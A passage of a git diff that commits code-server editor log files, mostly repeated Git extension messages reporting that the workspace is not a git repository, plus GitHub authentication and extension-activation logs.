09:15:37.062 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 09:15:37.062 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:37.062 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 09:15:37.062 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:37.064 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 09:15:37.064 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:37.068 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 09:15:37.068 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:37.073 [info] > git rev-parse --show-toplevel [3ms] +2026-01-31 09:15:37.073 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:37.080 [info] > git rev-parse --show-toplevel [4ms] +2026-01-31 09:15:37.080 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:37.094 [info] > git rev-parse --show-toplevel [12ms] +2026-01-31 09:15:37.094 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:37.098 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 09:15:37.098 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:37.126 [info] > git rev-parse --show-toplevel [25ms] +2026-01-31 09:15:37.126 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:37.130 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 09:15:37.130 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:37.134 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 09:15:37.134 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:37.138 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 09:15:37.138 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:37.142 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-31 09:15:37.146 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 09:15:37.146 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:37.149 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 09:15:37.149 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:37.383 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 09:15:37.383 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:37.425 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 09:15:37.425 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:38.704 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 09:15:38.704 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:15:54.449 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 09:15:54.449 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:18:17.779 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 09:18:17.779 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 09:18:27.049 [info] > git rev-parse --show-toplevel [11ms] +2026-01-31 09:18:27.049 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost3/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost3/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..02ff82f --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost3/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-31 09:15:36.912 [info] Reading sessions from keychain... +2026-01-31 09:15:36.912 [info] Getting sessions for all scopes... +2026-01-31 09:15:36.912 [info] Got 0 sessions for ... +2026-01-31 09:15:36.912 [info] Getting sessions for all scopes... +2026-01-31 09:15:36.912 [info] Got 0 sessions for ... +2026-01-31 09:15:36.912 [info] Getting sessions for all scopes... +2026-01-31 09:15:36.912 [info] Got 0 sessions for ... +2026-01-31 09:15:36.912 [info] Getting sessions for all scopes... +2026-01-31 09:15:36.912 [info] Got 0 sessions for ... +2026-01-31 09:15:36.912 [info] Getting sessions for all scopes... +2026-01-31 09:15:36.912 [info] Got 0 sessions for ... +2026-01-31 09:15:36.912 [info] Getting sessions for all scopes... +2026-01-31 09:15:36.912 [info] Got 0 sessions for ... +2026-01-31 09:15:36.912 [info] Getting sessions for all scopes... +2026-01-31 09:15:36.912 [info] Got 0 sessions for ... +2026-01-31 09:15:36.912 [info] Getting sessions for all scopes... +2026-01-31 09:15:36.912 [info] Got 0 sessions for ... +2026-01-31 09:15:36.912 [info] Getting sessions for all scopes... +2026-01-31 09:15:36.912 [info] Got 0 sessions for ... +2026-01-31 09:15:36.921 [info] Getting sessions for all scopes... +2026-01-31 09:15:36.921 [info] Got 0 sessions for ... +2026-01-31 09:15:36.946 [info] Getting sessions for all scopes... +2026-01-31 09:15:36.946 [info] Got 0 sessions for ... +2026-01-31 09:15:36.946 [info] Getting sessions for all scopes... +2026-01-31 09:15:36.946 [info] Got 0 sessions for ... +2026-01-31 09:15:36.947 [info] Getting sessions for all scopes... +2026-01-31 09:15:36.947 [info] Got 0 sessions for ... +2026-01-31 09:15:36.947 [info] Getting sessions for all scopes... +2026-01-31 09:15:36.947 [info] Got 0 sessions for ... +2026-01-31 09:15:36.947 [info] Getting sessions for all scopes... +2026-01-31 09:15:36.947 [info] Got 0 sessions for ... +2026-01-31 09:15:38.801 [info] Getting sessions for all scopes... +2026-01-31 09:15:38.801 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost3/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost3/vscode.github/GitHub.log new file mode 100755 index 0000000..b71bec7 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost3/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-31 09:15:37.134 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost3/vscode.markdown-language-features/Markdown.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost3/vscode.markdown-language-features/Markdown.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost4/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost4/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost4/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost4/remoteexthost.log new file mode 100755 index 0000000..8b479bf --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost4/remoteexthost.log @@ -0,0 +1,17 @@ +2026-01-31 10:53:13.061 [info] Extension host with pid 184448 started +2026-01-31 10:53:13.071 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-01-31 10:53:13.376 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-31 10:53:13.377 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-31 10:53:13.377 [info] ExtensionService#_doActivateExtension vscode.extension-editing, startup: false, activationEvent: 'onLanguage:markdown' +2026-01-31 10:53:13.377 [info] ExtensionService#_doActivateExtension vscode.markdown-language-features, startup: false, activationEvent: 'onLanguage:markdown' +2026-01-31 10:53:13.735 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-31 10:53:13.756 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-31 10:53:13.757 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-31 10:53:13.881 [info] ExtensionService#_doActivateExtension vscode.markdown-math, startup: false, activationEvent: 'api', root cause: vscode.markdown-language-features +2026-01-31 10:53:14.114 [info] Eager extensions activated +2026-01-31 10:53:14.115 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-31 10:53:14.115 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-31 10:53:14.228 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-31 17:27:10.394 [info] Extension host terminating: received terminate message from renderer +2026-01-31 17:27:10.395 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-31 17:27:10.428 [info] Extension host with pid 184448 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost4/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost4/vscode.git/Git.log new file mode 100755 index 0000000..cae4c83 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost4/vscode.git/Git.log @@ -0,0 +1,161 @@ +2026-01-31 10:53:14.312 [info] [main] Log level: Info +2026-01-31 10:53:14.312 [info] [main] Validating found git in: "git" +2026-01-31 10:53:14.312 [info] [main] Using git "2.39.5" from "git" +2026-01-31 10:53:14.312 [info] [Model][doInitialScan] Initial repository scan started +2026-01-31 10:53:14.312 [info] > git rev-parse --show-toplevel [50ms] +2026-01-31 10:53:14.312 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 10:53:14.312 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 10:53:14.312 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 10:53:14.312 [info] > git rev-parse --show-toplevel [6ms] +2026-01-31 10:53:14.312 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 10:53:14.312 [info] > git rev-parse --show-toplevel [4ms] +2026-01-31 10:53:14.312 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 10:53:14.313 [info] > git rev-parse --show-toplevel [88ms] +2026-01-31 10:53:14.313 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 10:53:14.318 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 10:53:14.318 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 10:53:14.323 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 10:53:14.323 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 10:53:14.359 [info] > git rev-parse --show-toplevel [33ms] +2026-01-31 10:53:14.359 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 10:53:14.368 [info] > git rev-parse --show-toplevel [5ms] +2026-01-31 10:53:14.368 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 10:53:14.374 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 10:53:14.374 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 10:53:14.380 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 10:53:14.380 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 10:53:14.386 [info] > git rev-parse --show-toplevel [3ms] +2026-01-31 10:53:14.386 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 10:53:14.393 [info] > git rev-parse --show-toplevel [4ms] +2026-01-31 10:53:14.393 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 10:53:14.404 [info] > git rev-parse --show-toplevel [8ms] +2026-01-31 10:53:14.404 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 10:53:14.408 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 10:53:14.408 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 10:53:14.415 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-31 10:53:14.420 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 10:53:14.420 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 10:53:14.459 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 10:53:14.459 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 10:53:15.128 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 10:53:15.128 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 11:26:17.008 [info] > git rev-parse --show-toplevel [6ms] +2026-01-31 11:26:17.008 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 11:33:48.688 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 11:33:48.688 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 11:34:03.964 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 11:34:03.964 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 11:34:30.549 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 11:34:30.549 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 11:34:51.655 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 11:34:51.655 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 11:35:04.749 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 11:35:04.749 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 11:35:23.967 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 11:35:23.967 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 11:36:45.643 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 11:36:45.643 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 11:37:31.225 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 11:37:31.225 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 11:37:32.620 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 11:37:32.620 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 11:38:06.383 [info] > git rev-parse --show-toplevel [4ms] +2026-01-31 11:38:06.383 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 11:38:33.092 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 11:38:33.092 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 11:39:32.769 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 11:39:32.769 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 11:42:34.202 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 11:42:34.202 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 11:45:59.279 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 11:45:59.279 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 11:46:29.113 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 11:46:29.113 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 12:02:48.392 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 12:02:48.392 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 12:04:06.295 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 12:04:06.295 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 12:04:09.082 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 12:04:09.082 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 12:04:10.079 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 12:04:10.079 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 12:04:10.656 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 12:04:10.656 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 12:04:11.253 [info] > git rev-parse --show-toplevel [3ms] +2026-01-31 12:04:11.253 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 12:06:58.834 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 12:06:58.834 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 12:08:29.602 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 12:08:29.602 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 14:32:40.483 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 14:32:40.483 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 14:36:35.888 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 14:36:35.888 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 14:37:05.519 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 14:37:05.519 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 14:38:28.065 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 14:38:28.065 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 14:55:22.982 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 14:55:22.982 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 15:03:33.828 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 15:03:33.828 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 15:08:54.185 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 15:08:54.185 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 17:19:37.209 [info] > git rev-parse --show-toplevel [2ms] +2026-01-31 17:19:37.209 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 17:19:53.360 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 17:19:53.360 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-31 17:19:54.978 [info] > git rev-parse --show-toplevel [1ms] +2026-01-31 17:19:54.978 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost4/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost4/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..0810410 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost4/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-31 10:53:13.659 [info] Reading sessions from keychain... +2026-01-31 10:53:13.659 [info] Getting sessions for all scopes... +2026-01-31 10:53:13.659 [info] Got 0 sessions for ... +2026-01-31 10:53:13.659 [info] Getting sessions for all scopes... +2026-01-31 10:53:13.659 [info] Got 0 sessions for ... +2026-01-31 10:53:13.659 [info] Getting sessions for all scopes... +2026-01-31 10:53:13.659 [info] Got 0 sessions for ... +2026-01-31 10:53:13.659 [info] Getting sessions for all scopes... +2026-01-31 10:53:13.659 [info] Got 0 sessions for ... +2026-01-31 10:53:13.659 [info] Getting sessions for all scopes... +2026-01-31 10:53:13.659 [info] Got 0 sessions for ... +2026-01-31 10:53:13.659 [info] Getting sessions for all scopes... +2026-01-31 10:53:13.659 [info] Got 0 sessions for ... +2026-01-31 10:53:13.659 [info] Getting sessions for all scopes... +2026-01-31 10:53:13.659 [info] Got 0 sessions for ... +2026-01-31 10:53:13.659 [info] Getting sessions for all scopes... +2026-01-31 10:53:13.659 [info] Got 0 sessions for ... +2026-01-31 10:53:13.659 [info] Getting sessions for all scopes... +2026-01-31 10:53:13.659 [info] Got 0 sessions for ... +2026-01-31 10:53:13.686 [info] Getting sessions for all scopes... +2026-01-31 10:53:13.686 [info] Got 0 sessions for ... +2026-01-31 10:53:13.686 [info] Getting sessions for all scopes... +2026-01-31 10:53:13.686 [info] Got 0 sessions for ... +2026-01-31 10:53:13.686 [info] Getting sessions for all scopes... +2026-01-31 10:53:13.686 [info] Got 0 sessions for ... +2026-01-31 10:53:13.686 [info] Getting sessions for all scopes... +2026-01-31 10:53:13.686 [info] Got 0 sessions for ... +2026-01-31 10:53:13.686 [info] Getting sessions for all scopes... +2026-01-31 10:53:13.686 [info] Got 0 sessions for ... +2026-01-31 10:53:13.686 [info] Getting sessions for all scopes... +2026-01-31 10:53:13.686 [info] Got 0 sessions for ... +2026-01-31 10:53:15.124 [info] Getting sessions for all scopes... +2026-01-31 10:53:15.124 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost4/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost4/vscode.github/GitHub.log new file mode 100755 index 0000000..b9ea059 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost4/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-31 10:53:14.317 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost4/vscode.markdown-language-features/Markdown.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost4/vscode.markdown-language-features/Markdown.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost5/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost5/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost5/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost5/remoteexthost.log new file mode 100755 index 0000000..7afd82d --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost5/remoteexthost.log @@ -0,0 +1,14 @@ +2026-02-01 10:47:07.985 [info] Extension host with pid 254566 started +2026-02-01 10:47:07.993 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-02-01 10:47:08.134 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-02-01 10:47:08.135 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-02-01 10:47:08.247 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-02-01 10:47:08.270 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-02-01 10:47:08.271 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-02-01 10:47:08.460 [info] Eager extensions activated +2026-02-01 10:47:08.460 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-02-01 10:47:08.461 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-02-01 10:47:08.633 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-02-01 15:08:33.830 [info] Extension host terminating: received terminate message from renderer +2026-02-01 15:08:33.831 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-02-01 15:08:33.870 [info] Extension host with pid 254566 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost5/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost5/vscode.git/Git.log new file mode 100755 index 0000000..c55167a --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost5/vscode.git/Git.log @@ -0,0 +1,89 @@ +2026-02-01 10:47:08.561 [info] [main] Log level: Info +2026-02-01 10:47:08.561 [info] [main] Validating found git in: "git" 